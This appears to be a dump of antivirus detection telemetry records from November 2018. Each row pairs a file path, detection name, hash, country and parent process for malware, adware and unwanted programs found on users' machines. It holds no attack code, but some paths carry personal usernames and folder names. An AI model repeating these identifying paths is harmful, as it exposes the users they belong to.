  Row(detection=Row(filename='xtpkgtgmbiq.dll', filepath='C:\\Windows\\Temp\\nsqE277.tmp\\xTPKGtGMbiQ.dll', filesize=1152000, name='Adware/Zdengo.fru.#M1.#R1'), hash='ea813cd4129df283f7ae7bc890fd650fc1d876e20be0e460aba3eac62a93efc0', metadata=Row(cmdline='0x63c', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\audiodg.exe', parentsize=None, timestamp='2018-11-02T23:11:01Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='autmgr32.exe', filepath='D:\\Test_server_backup\\Public\\visual_studio_6.0Disk1\\OS\\SYSTEM\\AUTMGR32.EXE', filesize=192000, name='W32/Alman.BB.#M1.#R1'), hash='9f908a8fe65d1568416e7d0c1f3f39b7f3d014768bb74c9958900dde4b0f7ac1', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T01:47:50Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='pdfcreator-1_3_2_setup-downloader.exe', filepath='E:\\OneDrive\\- DJH - DIVERSE SOFTWARE\\PDF CREATOR\\PDFCreator-1_3_2_setup-Downloader.exe', filesize=512000, name='PUA/DownloadSponsor.Gen.#M300.#R5738'), hash='a3f1f27443b1201b01fefdae9e5b5f27a3ac6422359ea85a8f89a2d5d080e148', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2872320, timestamp='2018-11-02T15:01:41Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='miner.exe', filepath='C:\\Program Files (x86)\\BetterHash\\Cores\\ewbf\\miner.exe', filesize=320000, name='PUA/CoinMiner.HO.#M1.#R1'), hash='84dd02debbf2b0c5ed7eebf813305543265e34ec98635139787bf8b882e7c7b4', metadata=Row(cmdline='-SILENT -RESUMELASTSTATE', country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\BetterHash\\BetterHash.exe', parentsize=13204056, timestamp='2018-11-02T09:27:28Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='miner.exe', filepath='C:\\Users\\X\\Downloads\\Setup\\Equihash\\NVIDIA\\miner.exe', filesize=320000, name='PUA/CoinMiner.HO.#M1.#R1'), hash='84dd02debbf2b0c5ed7eebf813305543265e34ec98635139787bf8b882e7c7b4', metadata=Row(cmdline='\\\\\\/4', country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\System32\\Taskmgr.exe', parentsize=1252576, timestamp='2018-11-02T16:43:06Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='searchprotocolhost.exe', filepath='C:\\Windows\\System32\\SearchProtocolHost.exe', filesize=192000, name='W32/Virut.Gen.#M1.#R1'), hash='ce0840c544b73dfca4a44f9b2118657b01ed0c790065af4dec89d3f1972202a5', metadata=Row(cmdline='\\\\\\/Embedding', country='DZ', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchIndexer.exe', parentsize=428032, timestamp='2018-11-02T17:41:13Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-222012-89eb5fe8', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_32434990\\AVSCAN-20181102-221829-7A5CEC69\\AVSCAN-20181102-222012-89EB5FE8', filesize=64000, name='TR/Siggen.rcdir.#M1.#R1'), hash='fbad3124805b2597f2a57f33dbe90c81b6c12fb510ccbdfc98331a92fe9cf52e', metadata=Row(cmdline=None, country='SY', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T22:20:10Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='miner.exe', filepath='C:\\Users\\X\\Desktop\\monero\\Zcash Miner\\miner.exe', filesize=320000, name='PUA/CoinMiner.HO.#M1.#R1'), hash='84dd02debbf2b0c5ed7eebf813305543265e34ec98635139787bf8b882e7c7b4', metadata=Row(cmdline=None, country='AR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\explorer.exe', parentsize=3932672, timestamp='2018-11-02T21:40:51Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-112535-ff0ff225', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_ad656924\\AVSCAN-20181102-112323-F1FB1D0A\\AVSCAN-20181102-112535-FF0FF225', filesize=1472000, name='TR/Dropper.MSIL.Gen.#M1.#R1'), hash='d4db4d74240a34b066207a80080cadd428136c7dd2b8b60d08d42f7559f37e4e', metadata=Row(cmdline=None, country='CL', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-02T14:25:37Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-020622-f70345ae', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_9e4d80d8\\AVSCAN-20181102-003900-7AC79805\\AVSCAN-20181102-020622-F70345AE', filesize=1600000, name='Adware/Agent.urvoa.#M300.#R7636'), hash='baa5d62ad4e67869cd3f251d88971f961902a01438f690b4192805a0c266af6d', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T08:08:20Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-064958-53904f0c', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_9625a9be\\AVSCAN-20181102-064112-1C8CC88F\\AVSCAN-20181102-064958-53904F0C', filesize=384000, name='TR/Kazy.172396.13.#M1.#R1'), hash='8f1dec1c6b9b63b8db50306eaa71bfdb6d70757a3a6c204d4e0cf5c635cdaf72', metadata=Row(cmdline=None, country='GR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:49:58Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='setup.exe', filepath='C:\\Program Files (x86)\\Intel\\Intel(R) USB 3.0 eXtensible Host Controller Driver\\uninstall\\Setup.exe', filesize=1024000, name='W32/Sality.AT.#M1.#R1'), hash='e96a3dbfe25fa34212001fe9627835ddbfa56f19de26ac71e0be29fc9a19deb2', metadata=Row(cmdline='aepdu.dll,AePduRunUpdate', country='IL', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\rundll32.exe', parentsize=44544, timestamp='2018-11-02T22:30:07Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='regsetup.exe', filepath='j:\\العاب\\games  000\\العاب جديده\\the mummy\\RegSetup.exe', filesize=128000, name='W32/Neshta.A.#M1.#R1'), hash='b86de8e388337d67cb9813e7591e7d126cd5c01c04bbae08694851406bc908b8', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T14:35:44Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-171946-fe75a451', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_491cbe1e\\AVSCAN-20181102-171931-FC3993CC\\AVSCAN-20181102-171946-FE75A451', filesize=192000, name='TR/Black.Gen2.#M1.#R1'), hash='b124b6665445188efb183c3d638dde8aee99bf8072b6bb30a9eceb0c4ec4f7ce', metadata=Row(cmdline=None, country='PH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T09:20:05Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='00000010-c303a705', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-133320-BEB10C5F\\00000010-C303A705', filesize=1728000, name='WORM/VB.CZ.14.A.#M1.#R1'), hash='edf61ad6b9ffa8dc46ec04f4c05fff0823db2acb802b0c24ea74d97b6fe66e5a', metadata=Row(cmdline=None, country='TH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\ESET\\ESET NOD32 Antivirus\\ekrn.exe', parentsize=1999832, timestamp='2018-11-02T06:33:57Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=0, name='TR/Patched.Ren.Gen.#M2.#R3080'), hash='e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T15:32:06Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='player.dmg', filepath='/Users/jacekkalita/Downloads/Player.dmg', filesize=524000, name='Adware/OSX.Climpli.oovye.#M0.#R0'), hash='f790cca120d6f6c514fbaab4aa27f52ea50f59191e481b6e99ee76f942a3f0a8', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-02T10:05:06Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-101950-9d70d85c', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_2d3db38b\\AVSCAN-20181102-101826-91C75354\\AVSCAN-20181102-101950-9D70D85C', filesize=64000, name='TR/Siggen.64000.7.#M1.#R1'), hash='c030b37c4066998c7686b51d6cd8690308eeeadbec7712a6ae6190b18fd40916', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-02T03:19:38Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='wap.exe', filepath='c:\\program files (x86)\\prokaward\\wap.exe', filesize=4096000, name='SPR/Tool.AwardKeylogger.93.#M1.#R1'), hash='9c8d0a43aa95e439cede9b69cacfb3c606381bfd6745111c5cfe73a38af9ae38', metadata=Row(cmdline=None, country='TR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files (x86)\\ProKAward\\rsasws.exe', parentsize=98304, timestamp='2018-11-02T16:40:32Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='searchprotocolhost.exe', filepath='C:\\Windows\\System32\\SearchProtocolHost.exe', filesize=192000, name='W32/Virut.Gen.#M1.#R1'), hash='fabd9f8c7b4e5ff73d373254416d0ce1886816f9427e53996f3e96d4e8be7087', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchIndexer.exe', parentsize=428032, timestamp='2018-11-02T17:32:12Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='e_s50st7.exe', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\{437149C2-7CB7-40D9-B0F5-9D418878CB4F}\\E_S50ST7.EXE', filesize=192000, name='W32/Alman.BB.#M1.#R1'), hash='b47a6f388e42623497fad3ddc07e1ee59e38ae820b13b300479dd377d4b2594d', metadata=Row(cmdline='aepdu.dll,AePduRunUpdate', country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\rundll32.exe', parentsize=44544, timestamp='2018-11-02T05:41:04Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='mdsched.exe', filepath='C:\\Windows\\System32\\MdSched.exe', filesize=192000, name='W32/Virut.Gen.#M1.#R1'), hash='f09faf00f06ade841b508c057937ddbb12d306934f1a8de5fb9148d333731f6b', metadata=Row(cmdline='-k LocalSystemNetworkRestricted', country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\svchost.exe', parentsize=20992, timestamp='2018-11-04T17:16:10Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='xtpkgtgmbiq.dll', filepath='\\\\?\\C:\\Windows\\Temp\\nsgE319.tmp\\xTPKGtGMbiQ.dll', filesize=1152000, name='Adware/Zdengo.fru.#M1.#R1'), hash='ea813cd4129df283f7ae7bc890fd650fc1d876e20be0e460aba3eac62a93efc0', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T08:43:17Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp0023983d', filepath='C:\\Windows\\TEMP\\tmp00001300\\tmp0023983d', filesize=896000, name='TR/Crypt.XPACK.Gen.#M300.#R4131'), hash='f96f96dd2ab9b124abc25a93555401be75b82c4724392628cb6d00d2e529426d', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\IObit\\Advanced SystemCare Ultimate\\ASCAvSvc.exe', parentsize=1990928, timestamp='2018-11-04T20:43:35Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp0023b376', filepath='C:\\Windows\\TEMP\\tmp00001300\\tmp0023b376', filesize=896000, name='TR/Crypt.XPACK.Gen.#M300.#R4131'), hash='f96f96dd2ab9b124abc25a93555401be75b82c4724392628cb6d00d2e529426d', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\IObit\\Advanced SystemCare Ultimate\\ASCAvSvc.exe', parentsize=1990928, timestamp='2018-11-04T21:12:48Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='d8dcde5e9ceff8ad5b7494fbb855d3f1673ba1622b23dc62ad3eb555029c5709', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries_31.10.2018-32.categorizing\\D8DCDE5E9CEFF8AD5B7494FBB855D3F1673BA1622B23DC62AD3EB555029C5709', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='d8dcde5e9ceff8ad5b7494fbb855d3f1673ba1622b23dc62ad3eb555029c5709', metadata=Row(cmdline='-r', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Kaspersky Lab\\Kaspersky Internet Security 18.0.0\\avp.exe', parentsize=354672, timestamp='2018-11-04T15:57:42Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='hrl17b.tmp', filepath='\\\\?\\D:\\Documents and Settings\\X\\Local Settings\\Temp\\hrl17B.tmp', filesize=64000, name='W32/Virut.Gen.#M1.#R1'), hash='c0fc4bfba45ba7de276c1a3e2ba91619b50e4a54a8c4b21c3447e7ec0da95007', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T22:04:32Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp002955d2', filepath='C:\\Windows\\TEMP\\tmp00006b29\\tmp002955d2', filesize=896000, name='TR/Crypt.XPACK.Gen.#M300.#R4131'), hash='f96f96dd2ab9b124abc25a93555401be75b82c4724392628cb6d00d2e529426d', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\IObit\\Advanced SystemCare Ultimate\\ASCAvSvc.exe', parentsize=1990928, timestamp='2018-11-04T06:00:22Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='unrhino.exe', filepath='\\\\192.168.1.7\\圖檔總目錄\\備用\\CAD\\Rhinoceros 1.1 Evaluation\\UNRHINO.EXE', filesize=128000, name='HEUR/Patched.Ren.#M1.#R1'), hash='ed9c7ab34a3206cd92f9364af4984b5b4c424d4dd432e3d05b1101a5c1e7e8e5', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Cobian Backup 11\\Cobian.exe', parentsize=720896, timestamp='2018-11-04T16:02:01Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='fc4ea35cb930699a0b1865ad4e339ff69495391ae3b12ef494589290ba1c226d', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries_31.10.2018-31.categorizing\\FC4EA35CB930699A0B1865AD4E339FF69495391AE3B12EF494589290BA1C226D', filesize=576000, name='HEUR/AGEN.1022030.#M1.#R1'), hash='fc4ea35cb930699a0b1865ad4e339ff69495391ae3b12ef494589290ba1c226d', metadata=Row(cmdline='-r', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Kaspersky Lab\\Kaspersky Internet Security 18.0.0\\avp.exe', parentsize=354672, timestamp='2018-11-04T16:09:17Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='searchprotocolhost.exe', filepath='C:\\Windows\\System32\\SearchProtocolHost.exe', filesize=192000, name='W32/Virut.Gen.#M1.#R1'), hash='d957b4ff0646abd39096b7b3b7f7431ca47fc4e84421eb2e8664afee59485aa7', metadata=Row(cmdline='\\\\\\/Embedding', country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchIndexer.exe', parentsize=428032, timestamp='2018-11-04T23:58:47Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='audiodg.exe', filepath='C:\\Windows\\System32\\audiodg.exe', filesize=128000, name='W32/Virut.Gen.#M1.#R1'), hash='e056c6741ecdb2ecc21a04ab350b0591cd30f50be4a2f6b64c9184a192fa4733', metadata=Row(cmdline='-k LocalSystemNetworkRestricted', country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\svchost.exe', parentsize=20992, timestamp='2018-11-04T03:52:52Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-143439-94b74bab', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_2ea81b95\\AVSCAN-20181104-143401-8D63E9FC\\AVSCAN-20181104-143439-94B74BAB', filesize=22980000, name='PUA/Fusion.DQ.#M1.#R1'), hash='f778b6f7714dee9066ca7d18aaa572b7e824a3cd871882687d20c61073cbd797', metadata=Row(cmdline=None, country='US', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T19:34:45Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='\xa0.exe', filepath='H:\\\xa0\\\xa0.exe', filesize=0, name='WORM/Taranis.2225.#M0.#R0'), hash='e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor=None, parentproc=None, parentsize=None, timestamp='2018-11-04T12:50:14Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-123004-a864b98a', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_41d5b8e7\\AVSCAN-20181104-122845-A09354E9\\AVSCAN-20181104-123004-A864B98A', filesize=896000, name='PUA/InstallCore.#M1.#R1'), hash='dcd335936e7fd1dba32881dcff49de018a24583a88ba6f4d7b1592ab9f7983b3', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T11:29:58Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='updater_zip_res0301_newmm[7].exe', filepath='\\\\?\\C:\\Windows\\System32\\config\\systemprofile\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Content.IE5\\Updater_zip_res0301_newmm[7].exe', filesize=10368000, name='ADWARE/ELEX.Gen.#M300.#R7708'), hash='f062a67cda8a7166a774b121aaaed4283fc49b671084b55745a7262df0b7b65e', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T09:25:48Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='transcodedwallpaper.jpg', filepath='C:\\Users\\X\\AppData\\Roaming\\Microsoft\\Windows\\Themes\\TranscodedWallpaper.jpg', filesize=3456000, name='EXP/MS04-028.JPEG.A.#M1.#R1'), hash='fc9b363587f8099b675b884e18b8256bee8f32d5514196b515a57b18c7734279', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2616320, timestamp='2018-11-01T13:54:53Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='$rrda4jr.exe', filepath='C:\\$Recycle.Bin\\S-1-5-21-2703089270-2420987216-934276835-1001\\$RRDA4JR.exe', filesize=22980000, name='PUA/Fusion.DQ.#M1.#R1'), hash='f778b6f7714dee9066ca7d18aaa572b7e824a3cd871882687d20c61073cbd797', metadata=Row(cmdline=None, country='LK', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files\\ESET\\ESET Security\\ekrn.exe', parentsize=2260144, timestamp='2018-11-01T15:18:05Z'), dt=datetime.date(2018, 11, 1))],
 [Row(detection=Row(filename='yahoo! powered diril', filepath='C:\\Windows\\System32\\Tasks\\Yahoo! Powered diril', filesize=4000, name='HTML/ExpKit.Gen.#M1.#R1'), hash='3265b893255a028475c06bee23f3fb1c9b1a3d1fbc7f50632a0bc55a13031cc0', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T11:51:09Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='nhmlocale.exe', filepath='G:\\A2 2018\\A3 2017\\New folder (2)\\A-3\\NHM Writer\\NHMlocale.exe', filesize=128000, name='W32/Virut.CEE.#M1.#R1'), hash='4c8fa152143d6518c34b0e3b0cdf0d044cded8734ce964a4ffe7167d7fe62ab2', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\Quick Heal\\Quick Heal IS Essentials\\sapissvc.exe', parentsize=280688, timestamp='2018-11-02T07:09:28Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avirasecuritycenteragent.exe', filepath='c:\\program files (x86)\\avira\\antivirus\\avirasecuritycenteragent.exe', filesize=840000, name='W32/Sality.Patched.#M1.#R1'), hash='4d3390f1bd3f6b3986e670c2eabfea2e528541ac16d0a33f07254858aaf4e781', metadata=Row(cmdline='\\/LOGFILE=\\"C:\\\\ProgramData\\\\Avira\\\\Antivirus\\\\LOGFILES\\\\AviraSecurityCenterAgent-2018-10-29-09-10-30.log\\" \\/LOGLEVEL=\\"STANDARD\\" \\/UPDATE_WSC=\\"ENABLE\\" \\/VDFDATE=\\"2018-10-24T00:00:00\\" \\/TRIGGER=\\"gpschd.dll Cyclic Check\\"', country='BR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Avira\\Antivirus\\sched.exe', parentsize=248312, timestamp='2018-11-02T15:45:29Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='wap.exe', filepath='\\\\?\\C:\\WINDOWS\\SysWOW64\\config\\1\\1\\2\\3\\1\\1\\wap.exe', filesize=4096000, name='SPR/Tool.AwardKeylogger.71.#M1.#R1'), hash='298cbe85ed29c3da3c0911f41b694304300d80e5b7bb00626165260169b0ac87', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T14:44:37Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='srv64', filepath='C:\\Windows\\System32\\srv64', filesize=576000, name='TR/Vools.mlupg.#M1.#R1'), hash='13ab3d572b30a77009d8d417be0cce6774b7590a302ac0e6f9843e1ba693a243', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\McAfee\\VirusScan Enterprise\\x64\\McShield.exe', parentsize=181480, timestamp='2018-11-02T02:48:58Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='@mms.exe', filepath='D:\\Files\\@mms.exe', filesize=4096000, name='TR/Worm.Gen.#M300.#R7610'), hash='2316af70222b1bb0d48c53078808ec662a0e57b16cf6392f5d2e80ca7eb4a477', metadata=Row(cmdline='rtp', country='UG', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files\\SMADAV\\SMΔRTP.exe', parentsize=1903696, timestamp='2018-11-02T09:07:05Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='sqldumper.exe', filepath='C:\\Program Files (x86)\\Microsoft SQL Server\\100\\Shared\\SqlDumper.exe', filesize=156000, name='W32/Sality.AT.#M1.#R1'), hash='1cc709f4fad05836407c8cf12ea1fb2ef34da9698a0ea78771b51e209150b739', metadata=Row(cmdline='aepdu.dll,AePduRunUpdate', country='PH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\rundll32.exe', parentsize=44544, timestamp='2018-11-02T06:44:14Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-110744-316ab188', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_25d516d9\\AVSCAN-20181102-110715-2C520CC1\\AVSCAN-20181102-110744-316AB188', filesize=196000, name='HTML/Drop.VBS.A.#M1.#R1'), hash='0c7fa4ad513908b937feb30baa9a71ea7322b26acb5bb2642fa83a1ce2d894af', metadata=Row(cmdline=None, country='PK', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T06:09:47Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avirasecuritycenteragent.exe', filepath='C:\\program files\\avira\\antivirus\\AviraSecurityCenterAgent.exe', filesize=840000, name='W32/Sality.Patched.#M1.#R1'), hash='4d3390f1bd3f6b3986e670c2eabfea2e528541ac16d0a33f07254858aaf4e781', metadata=Row(cmdline=None, country='BO', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\AVAST Software\\Avast\\aswidsagent.exe', parentsize=6800144, timestamp='2018-11-02T20:15:24Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-180457-1ef3eb9b', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_06da8660\\AVSCAN-20181102-175748-E82542AD\\AVSCAN-20181102-180457-1EF3EB9B', filesize=212000, name='PUA/OptimizerPro.Gen.#M300.#R6073'), hash='2a33ac6bc880560eada16c962b64dd9835ad890bda09f8d14095db0882703f16', metadata=Row(cmdline=None, country='AT', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T17:04:56Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='plugin.dll', filepath='\\\\?\\C:\\Users\\X\\Desktop\\Anubis-Lineage Mobile Bot\\plugin.dll', filesize=2560000, name='TR/BHO.Gen.#M300.#R3363'), hash='5da2bc60bcb4645cc005ccad3fbd9a109dbaa948506a9ccaab246c034bd5aa30', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T15:17:23Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-194528-2de53cc6', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_6b332e29\\AVSCAN-20181102-193336-AEBBE253\\AVSCAN-20181102-194528-2DE53CC6', filesize=960000, name='TR/Crypt.XPACK.Gen2.#M1.#R1'), hash='5a436798dbe7503e99e0db771b57e5f33da119ee6b3f5ebe8d3f37aa3c8e7ec5', metadata=Row(cmdline=None, country='IT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T18:45:29Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='amd64.bat', filepath='D:\\DOKUMENKU\\PPATK\\Grips-CTR-Client\\platform\\modules\\lib\\amd64\\amd64.bat', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe19_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe19 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=164352, timestamp='2018-11-02T09:50:56Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='transcodedwallpaper.jpg', filepath='C:\\Users\\X\\AppData\\Roaming\\Microsoft\\Windows\\Themes\\TranscodedWallpaper.jpg', filesize=3456000, name='EXP/MS04-028.JPEG.A.#M1.#R1'), hash='4b525aaa4ae479f3c4bdabc51ca3b966be9d881f74cc7f3e840b73e413ccef6d', metadata=Row(cmdline=None, country='DZ', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2616320, timestamp='2018-11-02T13:00:01Z'), dt=datetime.date(2018, 11, 2)),
